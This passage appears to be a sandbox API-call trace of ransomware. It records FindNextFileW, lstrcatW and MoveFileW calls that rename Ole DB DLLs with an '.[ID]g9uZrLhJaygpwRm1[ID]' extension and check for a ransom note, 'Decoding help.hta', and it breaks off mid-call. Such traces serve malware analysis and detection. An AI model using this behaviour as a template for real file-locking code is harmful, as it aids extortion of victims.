[0044.468] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.468] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaer.dll") returned -1 [0044.468] lstrlenW (lpString="msdaer.dll") returned 10 [0044.468] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.468] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdaer.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll" [0044.468] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll" [0044.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaer.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaer.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.469] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaecb70b8, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xaecb70b8, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bb8e210, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x46000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaora.dll", cAlternateFileName="")) returned 1 [0044.469] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.469] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.469] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.469] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaora.dll") returned -1 [0044.469] lstrlenW (lpString="msdaora.dll") returned 11 [0044.469] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.469] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.469] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdaora.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll" [0044.469] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll" [0044.469] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaora.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaora.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.469] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b5129, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xaf3b5129, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x608c5fb0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaorar.dll", cAlternateFileName="")) returned 1 [0044.469] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.469] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.469] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.470] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaorar.dll") returned -1 [0044.470] lstrlenW (lpString="msdaorar.dll") returned 12 [0044.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.470] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.470] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdaorar.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll" [0044.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll" [0044.470] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaorar.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaorar.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.471] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x868e16a4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x868e16a4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x868e16a4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0044.471] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.471] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.471] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.471] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaosp.dll") returned -1 [0044.471] lstrlenW (lpString="msdaosp.dll") returned 11 [0044.471] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.471] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.471] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdaosp.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll" [0044.471] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll" [0044.471] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaosp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaosp.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.471] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd6e1ed2, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbd6e1ed2, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bc4c8f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaps.dll", cAlternateFileName="")) returned 1 [0044.471] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.471] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.471] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.472] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaps.dll") returned -1 [0044.472] lstrlenW (lpString="msdaps.dll") returned 10 [0044.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.472] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdaps.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll" [0044.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll" [0044.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaps.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaps.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.472] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaddd679c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xaddd679c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bcbf4e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasc.dll", cAlternateFileName="")) returned 1 [0044.472] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.472] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.472] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdasc.dll") returned -1 [0044.472] lstrlenW (lpString="msdasc.dll") returned 10 [0044.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.472] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdasc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll" [0044.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll" [0044.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.473] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb5ad74, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8eb5ad74, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8eb80ed5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x95000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasql.dll", cAlternateFileName="")) returned 1 [0044.473] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.473] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.473] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdasql.dll") returned -1 [0044.473] lstrlenW (lpString="msdasql.dll") returned 11 [0044.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.473] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdasql.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll" [0044.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll" [0044.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasql.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasql.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.474] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb37fe67e, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb37fe67e, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x60d883e0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasqlr.dll", cAlternateFileName="")) returned 1 [0044.474] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.474] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.474] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.474] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdasqlr.dll") returned -1 [0044.474] lstrlenW (lpString="msdasqlr.dll") returned 12 [0044.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.475] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdasqlr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll" [0044.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll" [0044.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: 